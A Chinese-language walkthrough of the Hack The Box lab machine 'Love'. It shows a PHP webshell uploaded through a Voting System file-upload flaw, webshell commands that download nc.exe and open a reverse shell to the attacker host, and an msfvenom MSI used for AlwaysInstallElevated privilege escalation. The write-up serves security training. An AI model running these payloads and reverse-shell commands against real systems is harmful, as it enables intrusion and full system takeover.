Love-htb-writeup

0x00 靶场技能介绍

章节技能:SSRF漏洞、管理员后台识别、Voting System 文件上传漏洞、winPEASx64.exe 工具使用、alwaysinstallelevated提权

参考链接:https://0xdf.gitlab.io/2021/08/07/htb-love.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.239

2、扫描下靶机开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.10.239 -oG allports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-18 20:18 CST
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.28s latency).
Not shown: 62833 closed tcp ports (reset), 2686 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5000/tcp  open  upnp
5040/tcp  open  unknown
7680/tcp  open  pando-pub
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 39.25 seconds
                                                                                                               
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
80,135,139,443,445,3306,5000,5040,7680,49664,49665,49666,49667,49668,49669,49670, 

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,135,139,443,445,3306,5000,5040,7680,49664,49665,49666,49667,49668,49669,49670 -sV -sC --min-rate=10000 10.10.10.239
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-18 20:21 CST
Nmap scan report for 10.10.10.239
Host is up (0.29s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn: 
|_  http/1.1
|_http-title: 400 Bad Request
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   LDAPBindReq, LDAPSearchReq, SMBProgNeg, TLSSessionReq, X11Probe, giop, ms-sql-s: 
|_    Host '10.10.14.11' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=3/18%Time=65F831C5%P=aarch64-unknown-linux
SF:-gnu%r(TLSSessionReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.11'\x20
SF:is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serve
SF:r")%r(SMBProgNeg,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.11'\x20is\x
SF:20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%
SF:r(X11Probe,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.11'\x20is\x20not\
SF:x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAP
SF:SearchReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.11'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(LDAPB
SF:indReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.11'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(ms-sql-s
SF:,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.11'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,4A,"F\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.14\.11'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-03-18T12:45:33
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-03-18T05:45:30-07:00
|_clock-skew: mean: 2h41m33s, deviation: 4h02m30s, median: 21m32s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.78 seconds

3、绑定下本地hosts域名

1
2
3
4
5
6
7
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.239 staging.love.htb" | sudo tee -a /etc/hosts
10.10.10.239 staging.love.htb
               
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.239 love.htb" | sudo tee -a /etc/hosts
10.10.10.239 love.htb

4、查看是否存在SMB匿名访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.10.239 -N
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.239      

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)

5、扫描下nbt服务

1
2
3
4
5
6
┌──(kali㉿offsec)-[~/Desktop]
└─$ nbtscan 10.10.10.239
Doing NBT name scan for addresses from 10.10.10.239

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------

6、好吧,那只能从WEB层面上看看有啥发现了

http://10.10.10.239/

http://love.htb/

http://10.10.10.239:5000/

https://10.10.10.239/

7、不过我们在 子域名的资产下发现了一些有趣的功能

http://staging.love.htb/
Free File Scanner

8、经过摸索发现这个可以访问到一些无法访问的页面信息

http://staging.love.htb/beta.php

Vote Admin Creds admin: @LoveIsInTheAir!!!!

9、这里获取到了一个管理员的账号密码信息,且使用该账号密码成功登录到了 http://love.htb/ 的后台页面

http://love.htb/admin/home.php

admin: @LoveIsInTheAir!!!!

10、根据显示的系统名称,开始搜索相关漏洞信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit Voting System           
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass                                 | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi)                      | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated)             | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execut | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scrip | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI)                             | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)    | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                  | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI  (Unauthenticated SQL injection)         | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date | php/webapps/50052.txt

https://www.exploit-db.com/exploits/49846

11、验证下是否可以利用成功

http://love.htb/images/shell.php

love\phoebe

12、发现可以正常利用,那就上次一个一句话木马吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
POST /admin/candidates_add.php HTTP/1.1
Host: love.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------237462814410358609331722540061
Content-Length: 847
Origin: http://love.htb
Connection: close
Referer: http://love.htb/admin/candidates.php
Cookie: PHPSESSID=0o07bpnr5bkihtvseamu1o4d1o
Upgrade-Insecure-Requests: 1

-----------------------------237462814410358609331722540061
Content-Disposition: form-data; name="firstname"

test1
-----------------------------237462814410358609331722540061
Content-Disposition: form-data; name="lastname"

test1
-----------------------------237462814410358609331722540061
Content-Disposition: form-data; name="position"

8
-----------------------------237462814410358609331722540061
Content-Disposition: form-data; name="photo"; filename="shell1.php"
Content-Type: application/octet-stream

<?php system($_GET["cmd"]); ?>

-----------------------------237462814410358609331722540061
Content-Disposition: form-data; name="platform"

11
-----------------------------237462814410358609331722540061
Content-Disposition: form-data; name="add"


-----------------------------237462814410358609331722540061--

1
2
3
4
5
6
7
8
9
10
11
12
13
http://love.htb/images/shell1.php?cmd=whoami

view-source:http://love.htb/images/shell1.php?cmd=net%20users
User accounts for \\LOVE

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
Phoebe                   WDAGUtilityAccount       
The command completed successfully.

http://love.htb/images/shell1.php?cmd=powershell%20pwd

Path ---- C:\xampp\htdocs\omrs\images

13、开始下载到靶机上面 nc.exe 进行构造反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
http://love.htb/images/shell1.php?cmd=powershell%20iwr%20-uri%20http://10.10.14.11:8000/nc.exe%20-Outfile%20nc.exe

view-source:http://love.htb/images/shell1.php?cmd=powershell%20dir



    Directory: C:\xampp\htdocs\omrs\images


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         3/18/2024   7:00 AM            641 allports                                                             
-a----         5/18/2018   8:10 AM           4240 facebook-profile-image.jpeg                                          
-a----         4/12/2021   3:53 PM              0 index.html.txt                                                       
-a----         1/26/2021  11:08 PM            844 index.jpeg                                                           
-a----         3/18/2024   7:15 AM          68608 nc.exe                                                               
-a----         8/24/2017   4:00 AM          26644 profile.jpg                                                          
-a----         3/18/2024   7:05 AM             31 shell1.php     


http://love.htb/images/shell1.php?cmd=nc.exe%20-e%20cmd%2010.10.14.11%20443


┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443        
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.239] 52598
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\xampp\htdocs\omrs\images>

14、获取到第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PS C:\xampp\htdocs\omrs\images> cd C:/Users/phoebe/Desktop
cd C:/Users/phoebe/Desktop
PS C:\Users\phoebe\Desktop> dir
dir


    Directory: C:\Users\phoebe\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-ar---         3/18/2024   5:39 AM             34 user.txt                                                             


PS C:\Users\phoebe\Desktop> type user.txt
type user.txt
a8ea45451becedda2f7fe82a9e0b3b1b
PS C:\Users\phoebe\Desktop>

0x02 系统权限获取

15、查询当前用户特权和系统信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
PS C:\Users\phoebe\Desktop> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
PS C:\Users\phoebe\Desktop> 

PS C:\Users\phoebe\Desktop> systeminfo
systeminfo

Host Name:                 LOVE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          roy
Registered Organization:   
Product ID:                00330-80112-18556-AA148
Original Install Date:     4/12/2021, 12:14:12 PM
System Boot Time:          3/18/2024, 5:38:48 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume3
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,560 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,035 MB
Virtual Memory: In Use:    1,764 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\LOVE
Hotfix(s):                 9 Hotfix(s) Installed.
                           [01]: KB4601554
                           [02]: KB4562830
                           [03]: KB4570334
                           [04]: KB4577586
                           [05]: KB4580325
                           [06]: KB4586864
                           [07]: KB4589212
                           [08]: KB5000802
                           [09]: KB5000858
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.239
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\Users\phoebe\Desktop>

16、没啥特大的发现,下载到靶机上面 winPEASx64.exe 工具进行枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
PS C:\Users\phoebe\Desktop> iwr -uri http://10.10.14.11:8000/winPEASx64.exe -Outfile winPEASx64.exe
iwr -uri http://10.10.14.11:8000/winPEASx64.exe -Outfile winPEASx64.exe
PS C:\Users\phoebe\Desktop> 

PS C:\Users\phoebe\Desktop> dir
dir


    Directory: C:\Users\phoebe\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-ar---         3/18/2024   5:39 AM             34 user.txt                                                             
-a----         3/18/2024   7:28 AM        2387456 winPEASx64.exe                                                       


PS C:\Users\phoebe\Desktop>


C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt


����������͹ Checking AlwaysInstallElevated
�  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!




����������͹ Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    Phoebe::LOVE:1122334455667788:caa7ad88e80b18c4c6b40b87cbd8c25e:01010000000000002ee6a00f4479da01fc9c6908df4900eb00000000080030003000000000000000000000000020000044bfc71a7a300994b5dccfb90a515a292c986a1c1f22eaf55727f9e42d8c8bda0a00100000000000000000000000000000000000090000000000000000000000    

    File Permissions "C:\Administration\Program Files\VMware\VMware Tools\VMwareToolsUpgrader.exe": Phoebe [AllAccess],Authenticated Users [WriteData/CreateFiles]                                                             
     File Permissions "C:\Administration\Program Files\VMware\VMware Tools\x64\VMwareToolsUpgrader.exe": Phoebe [AllAccess],Authenticated Users [WriteData/CreateFiles]                                                         
     File Permissions "C:\Administration\setup.exe": Phoebe [AllAccess],Authenticated Users [WriteData/CreateFiles]                                                                                                             
     File Permissions "C:\Administration\setup64.exe": Phoebe [AllAccess],Authenticated Users [WriteData/CreateFiles]                                                                                                           
     File Permissions "C:\Administration\VMwareToolsUpgrader.exe": Phoebe [AllAccess],Authenticated Users [WriteData/CreateFiles]

17、使用 winPEAS 工具收集服务器信息,发现 AlwaysInstallElevated 开启。配合 Metasploit Framework 成功完成权限提升。

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated

18、生成一个反弹shell的安装文件

1
2
3
4
5
6
7
┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f msi -o rev.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: rev.msi

19、创建临时目录并下载安装

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
PS C:\xampp\htdocs\omrs\images> mkdir C:/temp
mkdir C:/temp


    Directory: C:\


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         3/18/2024   8:13 AM                temp                                                                 


PS C:\xampp\htdocs\omrs\images> cd C:/temp
cd C:/temp
PS C:\temp> 
PS C:\temp> wget http://10.10.14.11:8000/rev.msi -outfile rev.msi
wget http://10.10.14.11:8000/rev.msi -outfile rev.msi
PS C:\temp> dir
dir


    Directory: C:\temp


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         3/18/2024   8:14 AM         159744 rev.msi                                                              


PS C:\temp> msiexec /quiet /qn /i rev.msi
msiexec /quiet /qn /i rev.msi
PS C:\temp>

20、成功获取到高权限shell,并读取最终flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 4444       
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.239] 52605
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>cd C:/Users/Administrator/Desktop
cd C:/Users/Administrator/Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users\Administrator\Desktop

04/13/2021  03:20 AM    <DIR>          .
04/13/2021  03:20 AM    <DIR>          ..
03/18/2024  05:39 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,140,163,072 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
7fd9a1efe453c8e1435501f46bd9bd9d

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/344

打靶记
#shooting-range
Love-htb-writeup
https://sh1yan.top/2024/03/18/Love-htb-writeup/
作者
shiyan
发布于
2024年3月18日
许可协议